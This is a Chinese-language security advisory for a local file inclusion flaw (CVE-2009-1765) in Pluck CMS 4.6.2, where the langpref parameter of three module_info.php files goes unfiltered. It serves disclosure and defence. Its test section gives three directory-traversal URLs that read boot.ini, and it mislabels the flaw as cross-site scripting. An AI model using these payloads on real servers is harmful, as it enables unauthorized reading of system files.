发布日期：2009-05-18
更新日期：2009-05-20

受影响系统：

somp Pluck CMS 4.6.2

描述：

---

BUGTRAQ  ID: 35007
CVE(CAN) ID: CVE-2009-1765

pluck是用php编写的简单内容管理系统。

pluck的data/modules/contactform/module_info.php、data/modules/blog/module_info.php和data/modules/albums/module_info.php模块没有过滤对langpref参数所传送的输入便用于保护文件，远程攻击者可以通过跨站脚本攻击包含本地资源的任意文件。成功利用这个漏洞要求打开了register_globals。

<*来源：ahmadbady
  
  链接：http://secunia.com/advisories/35145/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

path/data/modules/contactform/module_info.php?langpref=../../../../../boot.ini
path/data/modules/blog/module_info.php?langpref=../../../../../boot.ini
path/data/modules/albums/module_info.php?langpref=../../../../../boot.ini

建议：

---

厂商补丁：

somp
----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.pluck-cms.org/

浏览次数：2333
严重程度：0（网友投票）